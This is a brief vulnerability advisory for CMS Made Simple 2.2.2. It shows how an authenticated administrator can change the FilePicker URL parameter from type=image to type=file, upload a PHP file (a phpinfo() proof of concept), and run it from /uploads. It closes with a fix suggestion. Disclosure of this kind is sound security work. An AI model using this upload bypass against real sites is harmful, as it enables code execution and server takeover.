FilePicker upload vulnerability exists in the CMS Made Simple (CMSMS) 2.2.2

Released: 07.08.2017
CMS Made Simple (CMSMS) 2.2.2 allows remote authenticated administrators to upload PHP files,and an attacker can obtain server privileges.

step 1

http://localhost/admin/login.php
Login administrator account

step 2 ##

Content Manager
http://localhost/admin/moduleinterface.php?mact=CMSContentManager,m1,admineditcontent,0&sk=663b23d5153f19ab551&m1contentid=1

click insert/edit picture

open the iframe

http://localhost/admin/moduleinterface.php?mact=FilePicker,m1,filepicker,0&sk=663b23d5153f19ab551&showtemplate=false&field=&inst=i15d516d828d&type=image

change type value
http://localhost/admin/moduleinterface.php?mact=FilePicker,m1,filepicker,0&sk
=663b23d5153f19ab551&showtemplate=false&field=&inst=i15d516d828d&type=file
upload the help.php

<?php
    phpinfo();
?>



step 3 ##

Visit this web page
http://localhost/uploads/help.php

Fix bug ##

1.Filter upload file format